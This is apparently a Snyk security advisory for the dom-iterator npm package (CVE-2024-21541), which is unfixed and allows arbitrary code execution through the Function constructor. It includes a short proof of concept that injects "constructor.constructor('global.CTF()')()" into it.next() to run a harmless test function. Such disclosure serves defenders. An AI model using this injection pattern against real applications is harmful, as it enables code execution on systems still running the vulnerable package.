Arbitrary Code Execution Affecting dom-iterator package, versions *
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-DOMITERATOR-6157199
- published 12 Nov 2024
- disclosed 15 Jan 2024
- credit NodeMedic-FINE
Introduced: 15 Jan 2024
CVE-2024-21541 Open this link in a new tabHow to fix?
There is no fixed version for dom-iterator.
Overview
dom-iterator is a feature-rich, well-tested Iterator for traversing DOM nodes.
Affected versions of this package are vulnerable to Arbitrary Code Execution due to use of the Function constructor without complete input sanitization. Function generates a new function body and thus care must be given to ensure that the inputs to Function are not attacker-controlled. The risks involved are similar to that of allowing attacker-controlled input to reach eval.
PoC
Executing this code will cause the code console.log("GLOBAL.CTF HIT") to be executed, leading to the output of the string 'GLOBAL.CTF HIT' to the console.
var PUT = require('dom-iterator');
global.CTF = function() { console.log("GLOBAL.CTF HIT") } // We want to prove we can execute this by using the package
var parser = require('mini-html-parser');
var html = '<h1></h1>'; // Any non-empty html should work
var parser = parser(html);
var node = parser.parse();
var it = PUT(node);
var next;
while (next = it.next("constructor.constructor('global.CTF()')()")) { }